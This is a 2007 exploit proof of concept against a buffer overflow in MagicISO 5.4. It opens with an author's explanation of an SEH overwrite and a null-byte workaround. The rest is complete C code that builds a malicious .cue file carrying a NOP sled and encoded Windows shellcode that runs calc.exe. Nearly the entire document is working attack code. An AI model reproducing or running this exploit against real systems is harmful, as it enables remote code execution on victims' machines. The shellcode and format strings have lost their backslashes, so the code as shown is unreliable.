Rated as : Moderate Risk
/*
-- poc/demo for magiciso exploit, found by n00b
-- by: v9@fakehalo.us
-- original email reply comments:
I actually looked into this when you posted this on milw0rm. I was able
to get it to run arbitrary code, however it was so unreliable it wasn't
worth me posting... however, it was informative.
you have control of several registers, however it's eax and edx(not ecx)
that are most interesting... the next instructions that get called(and
fault magiciso) are:
MOV DWORD PTR DS:[EDX],EAX
MOV DWORD PTR DS:[EAX+4],EDX
...now, with that you can overwrite any 4byte area in memory with anything
you want. the problem is you can't use null bytes(which is where the
shellcode and the current SEH handler is(non-PEB)) in this situation. (and
the 2nd MOV can trigger an exception, which you will want to overwrite the
handler of)
you can possibly use other methods, like you mentioned(although i didnt
try for this situation), but i chose to write SEH handler for that block
(if you trigger it with a bunch of x's it will show up right under it in
ollydbg)
step 1 for making the 0x00?????? (EDX) nullbyte:
you can just so happen to happen to overwrite this buffer with full
control until the end of the buffer. so, when most (C) functions write to
a buffer they will cap it with an 0x00 on the end, i just used that. so
the overflow has to be an EXACT size for that to work.
step 2 for making the 0x00?????? (EAX) nullbyte:
once i had control of where i was writing EAX to (EDX), i had to figure
out a way to make another nullbyte as that is where the shellcode was
located. to do this i came up with overwriting the SEH handler off-by-one,
overwriting a single throw-away byte into another memory address(that would
never be used), and leaving the original null-byte that was already there.
the downside to this is there is there was nothing left to keep track of
where the shellcode was, ie a simple CALL reg wasn't possible as by the
time i gained control of EIP there was no trace of where i was...so it
became a blind guess, and memory gets pretty scattered...never the less, it
is exploitable, and i popped up several calc.exe's when testing :)
even if not reliable, i found it an interesting workaround for null-bytes.
carry on if you like, here's the code i was using to test(which is
functional, just not reliable):
*/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <getopt.h>
/* winXP SP2 home (24bit, the first byte(0x00) will not be used) */
#define DFL_EAX 0xfd3ddd
#define DFL_EDX 0x12fb37
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 */
/* Encoder=PexFnstenvSub http://metasploit.com */
static unsigned char x86_exec[] =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x23"
"x75xbfx4ax83xebxfcxe2xf4xdfx9dxfbx4ax23x75x34x0f"
"x1fxfexc3x4fx5bx74x50xc1x6cx6dx34x15x03x74x54x03"
"xa8x41x34x4bxcdx44x7fxd3x8fxf1x7fx3ex24xb4x75x47"
"x22xb7x54xbex18x21x9bx4ex56x90x34x15x07x74x54x2c"
"xa8x79xf4xc1x7cx69xbexa1xa8x69x34x4bxc8xfcxe3x6e"
"x27xb6x8ex8ax47xfexffx7axa6xb5xc7x46xa8x35xb3xc1"
"x53x69x12xc1x4bx7dx54x43xa8xf5x0fx4ax23x75x34x22"
"x1fx2ax8exbcx43x23x36xb2xa0xb5xc4x1ax4bx0bx67xa8"
"x50x1dx27xb4xa9x7bxe8xb5xc4x16xdex26x40x5bxdax32"
"x46x75xbfx4a";
struct{
unsigned int eax;
unsigned int edx;
char *file;
char *dir;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
unsigned char write_cue(char *,unsigned int,unsigned int);
void printe(char *,short);
void usage(char *);
/* start. */
int main(int argc,char **argv){
signed int chr=0;
char *ptr;
printf("[*] magiciso[v5.4/build 0239]: buffer overflow
exploit.n"
"[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)n"
"[*] found by: n00bnn");
tbl.eax=DFL_EAX;
tbl.edx=DFL_EDX;
while((chr=getopt(argc,argv,"m:a:d:"))!=EOF){
switch(chr){
case 'm':
if(!tbl.dir){
if(!(ptr=rindex(optarg,'/')))
ptr=optarg;
else ptr++;
if(!(tbl.dir=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
if(!(tbl.file=(char *)malloc(strlen(ptr)+5)))
printe("main(): allocating memory failed",1);
sprintf(tbl.file,"%s.cue",ptr);
}
break;
case 'a':
sscanf(optarg,"%x",&tbl.eax);
break;
case 'd':
sscanf(optarg,"%x",&tbl.edx);
break;
default:
usage(argv[0]);
break;
}
}
if(((tbl.eax&0xff000000)>>24))
printe("EAX address isn't 24bit/3 bytes.",1);
if(((tbl.edx&0xff000000)>>24))
printe("EDX address isn't 24bit/3 bytes.",1);
if(!tbl.file)usage(argv[0]);
printf("[*] directory:ttt%sn",tbl.dir);
printf("[*] filename:ttt%s/%sn",tbl.dir,tbl.file);
printf("[*] EAX address:tt0x[00]%.6xn",tbl.eax);
printf("[*] EDX address:tt0x[00]%.6xnn",tbl.edx);
if(mkdir(tbl.dir,0755))
printe("failed to make directory.",1);
if(chdir(tbl.dir))
printe("failed to chdir to new directory.",1);
if(write_cue(tbl.file,tbl.eax,tbl.edx))
printe("failed to write to file.",1);
exit(0);
}
/* write the .cue file. */
unsigned char write_cue(char *file,unsigned int eax,unsigned int edx){
unsigned int i=0;
unsigned int real_eax=eax-4;
unsigned char filler='x';
unsigned char nop=0x90;
FILE *fs;
if(!(fs=fopen(file, "wb")))return(1);
/* the "C:" is to make the overflowed buffer a static size. */
fprintf(fs,"FILE "C:");
for(i=0;i<1022;i++){
fwrite(&filler,1,1,fs);
}
/* this is an unused byte, the off-by-one write that keeps */
/* the original null-byte in the SEH handler making this written */
/* to one byte above the SEH handler. (fills in EAX) */
fwrite(&filler,1,1,fs);
fwrite(&tbl.eax,3,1,fs);
fwrite(&tbl.edx,3,1,fs);
/* --- */
/* overflown buffer stops here, putting a null-byte on */
/* the end of the string to keep the null-byte for EDX */
fprintf(fs,"" BINARYnTRACK 01 MODE1/2355nINDEX 01
00:00:00n");
/* simply throwing the nops/shellcode into memory at the end of the file.
*/
for(i=0;i<500;i++){
fwrite(&nop,1,1,fs);
}
fwrite(&x86_exec,sizeof(x86_exec),1,fs);
fclose(fs);
return(0);
}
/* error! */
void printe(char *err,short e){
printf("[!] %sn",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-ad] -m directorynn",progname);
printf(" -m <dir>tdirectory to make and output .cue
to.n");
printf(" -a <addr>tEAX address, will become the SEH
handler"
" (0x[00]%.6x)n",tbl.eax);
printf(" -d <addr>tEDX address, points to where the SEH
handler is"
" (0x[00]%.6x)nn",tbl.edx);
exit(0);
}
securitydot.net - 2007-05-24
|
